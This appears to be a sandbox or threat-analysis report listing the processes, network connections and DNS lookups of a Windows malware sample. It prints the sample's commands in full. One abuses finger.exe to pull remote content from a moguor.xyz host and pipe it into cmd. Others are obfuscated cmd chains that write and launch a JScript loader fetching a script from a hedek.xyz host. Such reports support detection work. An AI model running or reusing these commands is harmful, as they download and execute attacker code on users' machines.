Technical Information
- '<SYSTEM32>\finger.exe' ok@ttaar4.moguor.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\NsA.js"
- %LOCALAPPDATA%\nsa.js
- 'tt####.moguor.xyz':79
- 'be####.hedek.xyz':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'tt####.moguor.xyz':79
- 'cl###flare.com':443
- DNS ASK tt####.moguor.xyz
- DNS ASK be####.hedek.xyz
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger ok@ttaar4.moguor.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt DZDB=.j&&SEt UGYTF=v1xJear1xJe a =1xJe 'sc1xJeri1xJept1xJe:'; b =1xJe 'h1xJeTtP1xJe:'; G1xJeet1xJeObj1xJeec1xJet(1xJea+b+'&&sET 31XY=LWKWYLWKWYbeiie2.hedek.xyzLWKWY?1LWKWY')&&sEt/^p...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p T9P36="%UGYTF:1xJe=%%31XY:LWKWY=/%" 0<nul 1>%LOCALAPPDATA%\NsA%DZDB%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\NsA%DZDB%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\NsA.js